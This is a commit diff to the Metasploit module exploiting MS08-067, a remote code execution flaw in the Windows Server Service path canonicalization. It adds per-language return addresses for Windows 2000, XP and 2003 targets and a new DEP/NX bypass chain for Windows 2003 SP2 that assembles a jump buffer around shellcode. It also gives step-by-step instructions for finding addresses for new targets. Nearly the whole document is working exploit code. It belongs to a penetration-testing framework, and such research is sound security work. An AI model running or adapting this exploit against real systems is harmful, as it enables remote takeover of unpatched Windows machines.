Lots of new targets merged in for MS08-067 including Brett Moore's 2003 SP2 DEP bypass

git-svn-id: file:///home/svn/framework3/trunk@5812 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/smb/ms08_067_netapi.rb

@@ -26,16 +26,17 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
         		This module exploits a parsing flaw in the path canonicalization code of
 				NetAPI32.dll through the Server Service. This module is capable of bypassing
-				DEP on some operating systems and service packs. The correct target must be
+				NX on some operating systems and service packs. The correct target must be
 				used to prevent the Server Service (along with a dozen others in the same
 				process) from crashing. Windows XP targets seem to handle multiple successful
 				exploitation events, but 2003 targets will often crash or hang on subsequent
 				attempts. This is just the first version of this module, full support for
-				DEP bypass on 2003, along with other platforms, is still in development.
+				NX bypass on 2003, along with other platforms, is still in development.
 			},
 			'Author'         => 
 				[
-					'hdm' # with tons of input/help/testing from the community
+					'hdm', # with tons of input/help/testing from the community
+					'Brett Moore <brett.moore[at]insomniasec.com>'
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
@@ -60,44 +61,128 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        => 
 				[
-					[ 'Windows XP SP2 English (DEP)', 
+
+					#
+					# Antoine's universal for Windows 2000 with MS06-040 applied
+					# Use ms06_040_netapi for systems without this patch.
+					#
+					[ 'Windows 2000 MS06-040+ (YMMV pre MS06-040)',
+						{
+							'Ret'       => 0x001f1cb0,
+							'Scratch'   => 0x00020408,
+						}
+					], # JMP EDI Windows 2000 Universal	
+									
+					#
+					# Metasploit's NX bypass for XP SP2/SP3 
+					#				
+					[ 'Windows XP SP2 English (NX)', 
 						{
 							'Ret'       => 0x6f88f727, 
 							'DisableNX' => 0x6F8916E2, 
 							'Scratch'   => 0x00020408, 
 						}
-					], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
+					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
-					[ 'Windows XP SP3 English (DEP)', 
+					#
+					# Metasploit's NX bypass for XP SP2/SP3 
+					# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
+					#					
+					[ 'Windows XP SP2 Italian (NX)', 
+						{
+							'Ret'       => 0x596bf727,
+							'DisableNX' => 0x596c16e2,
+							'Scratch'   => 0x00020408, 
+						}
+					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
+
+					#
+					# Metasploit's NX bypass for XP SP2/SP3 
+					# Target provided by Ulises2k <ulises2k[at]gmail.com>
+					#					
+					[ 'Windows XP SP2 Spanish (NX)', 
+						{
+							'Ret'       => 0x6fdbf807,
+							'DisableNX' => 0x6fdc17c2,
+							'Scratch'   => 0x00020408, 
+						}
+					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
+															
+					#
+					# Metasploit's NX bypass for XP SP2/SP3 
+					# Target provided by sunwear <shellcoder[at]hotmail.com>
+					#					
+					[ 'Windows XP SP2 Chinese (NX)', 
+						{
+							'Ret'       => 0x58fcda43,
+							'DisableNX' => 0x58fc16e2,
+							'Scratch'   => 0x00020408, 
+						}
+					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
+
+					#
+					# Metasploit's NX bypass for XP SP2/SP3 
+					#					
+					[ 'Windows XP SP3 English (NX)', 
 						{
 							'Ret'       => 0x6f88f807,
 							'DisableNX' => 0x6F8917C2,
 							'Scratch'   => 0x00020408, 
 						}
-					], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
+					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
-					[ 'Windows 2003 SP0 English (NO DEP)',
+					#
+					# Metasploit's NX bypass for XP SP2/SP3 
+					# Target provided by Thierry Zoller <Thierry[at]zoller.lu>
+					#					
+					[ 'Windows XP SP3 German (NX)', 
+						{
+							'Ret'       => 0x6fda2bef,
+							'DisableNX' => 0x6fda17c2,
+							'Scratch'   => 0x00020408, 
+						}
+					], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
+										
+					#
+					# Standard return-to-ESI without NX bypass
+					#					
+					[ 'Windows 2003 SP0 English (NO NX)',
 						{
 							'Ret'       => 0x71bf175f, 
 							'Scratch'   => 0x00020408,
 						}
 					], # JMP ESI WS2HELP.DLL
-					[ 'Windows 2003 SP2 English (NO DEP)',
+					
+					#
+					# Standard return-to-ESI without NX bypass
+					#
+					[ 'Windows 2003 SP2 English (NO NX)',
 						{
 							'Ret'       => 0x71bf3969, 
 							'Scratch'   => 0x00020408,
 						}
 					], # JMP ESI WS2HELP.DLL
 					
+					#
+					# Brett Moore's crafty NX bypass for 2003 SP2
+					#
+					[ 'Windows 2003 SP2 English (NX)',
+						{
+							'RetDec'    => 0x7c86beb8,	# dec ESI, ret @NTDLL.DLL
+							'RetPop'    => 0x7ca1e84e, 	# push ESI, pop EBP, ret @SHELL32.DLL
+							'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
+							'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
+							'Scratch'   => 0x00020408,
+						}
+					]
+											
 					#
 					# Missing Targets
 					# Key:   T=TODO   ?=UNKNOWN   U=UNRELIABLE
 					#
-					# [T] Windows 2000 SP4  - Could not trigger with this vector (need a different call)
 					# [?] Windows XP SP0    - Could not trigger with this vector
 					# [?] Windows XP SP1    - Could not trigger with this vector
 					# [?] Windows 2003 SP1  - Could not trigger with this vector
-					# [T] Windows 2003 SP2  - Triggered but bypassing DEP requires more time
 					# [?] Windows Vista SP0 - Not tested yet
 					# [?] Windows Vista SP1 - Not tested yet
 					#
@@ -119,16 +204,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	*** WINDOWS XP SP2/SP3 TARGETS ***
 
 
-	This exploit bypasses DEP/NX by returning to a function call inside acgenral.dll that disables NX
+	This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
 	for the process and then returns back to a call ESI instruction. These addresses are different
 	between operating systems, service packs, and language packs, but the steps below can be used to
 	add new targets.
 	
 	
-	If the target system does not have NX/DEP, just place a "call ESI" return into both the Ret	and
+	If the target system does not have NX/NX, just place a "call ESI" return into both the Ret	and
 	DisableNX elements of the target hash.
 	
-	If the target system does have NX/DEP, obtain a copy of the acgenral.dll from that system.
+	If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
 	First obtain the value for the Ret element of the hash with the following command:
 	
 	$ msfpescan -j esi acgenral.dll
@@ -154,12 +239,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		call    ds:__imp__NtSetInformationProcess@16		
 		
 	
-	*** WINDOWS XP/2000 NON-DEP TARGETS ***
+	*** WINDOWS XP NON-NX TARGETS ***
 	
 	
-	Instead of bypassing DEP, just return directly to a "JMP ESI", which takes us to the short 
+	Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short 
 	jump, and finally the shellcode. XP SP0 and XP SP1 may require a different opnum to get
-	reliable code execution.
+	reliable code execution. O
 	
 	
 	*** WINDOWS 2003 SP2 TARGETS ***
@@ -175,12 +260,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	*** WINDOWS 2000 TARGETS ***
 	
 	
-	Currently untested, but should be reliable using opnum 0x23 (ala EMM / ph4ntom)
+	No NX to bypass, just return directly to a "JMP EDX", which takes us to the short 
+	jump, and finally the shellcode. Systems without MS06-040 applied act differently
+	and should not be targeted with this exploit.
 	
 	
 	*** WINDOWS VISTA TARGETS ***
 	
-	Currently untested, will involve ASLR and DEP, should be fun.
+	Currently untested, will involve ASLR and NX, should be fun.
 	
 
 	*** NetprPathCanonicalize IDL ***
@@ -219,8 +306,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 		
 		prefix = "\\"
+		path   = ""
 		server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
 		
+		
+		#
+		# Windows 2000, XP (NX), and 2003 (NO NX) targets
+		#
+		if(not target['RetDec'])
+
 			jumper = Rex::Text.rand_text_alpha(70).upcase
 			jumper[ 4,4] = [target.ret].pack("V")
 			jumper[56,2] = make_nops(2)
@@ -252,7 +346,55 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				# NULL termination
 				"\x00" * 2
+		#
+		# Windows 2003 SP2 (NX) targets
+		#
+		else
 		
+			jumper = Rex::Text.rand_text_alpha(70).upcase
+			jumper[ 0,4] = [target['RetDec']].pack("V")# one more to Align and make room
+
+			jumper[ 4,4] = [target['RetDec']].pack("V") # 4 more for space
+			jumper[ 8,4] = [target['RetDec']].pack("V") 
+			jumper[ 12,4] = [target['RetDec']].pack("V")
+			jumper[ 16,4] = [target['RetDec']].pack("V")
+
+			jumper[ 20,4] = [target['RetPop']].pack("V")# pop to EBP
+			jumper[ 24,4] = [target['DisableNX']].pack("V")
+
+			jumper[ 56,4] = [target['JmpESP']].pack("V")
+			jumper[ 60,4] = [target['JmpESP']].pack("V")
+			jumper[ 64,2] = "\xeb\x02"                    # our jump
+			jumper[ 68,2] = "\xeb\x62"					  # original
+
+			path = 
+				Rex::Text.to_unicode("\\") +
+
+				# This buffer is removed from the front
+				Rex::Text.rand_text_alpha(100) + 
+
+				# Shellcode
+				payload.encoded +
+
+				# Relative path to trigger the bug
+				Rex::Text.to_unicode("\\..\\..\\") + 
+
+				# Extra padding
+				Rex::Text.to_unicode(pad) +
+
+				# Writable memory location (static)
+				[target['Scratch']].pack("V") + # EBP
+
+				# Return to code which disables NX (or just the return)
+				[target['RetDec']].pack("V") +
+
+				# Padding with embedded jump
+				jumper +
+
+				# NULL termination
+				"\x00" * 2
+		
+		end
 		
 		handle = dcerpc_handle(
 			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 
@@ -267,7 +409,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			NDR.uwstring(server) +
 			NDR.UnicodeConformantVaryingStringPreBuilt(path) +
 			NDR.long(rand(1024)) +
-			NDR.wstring("") +
+			NDR.wstring(prefix) +
 			NDR.long(4097) +
 			NDR.long(0)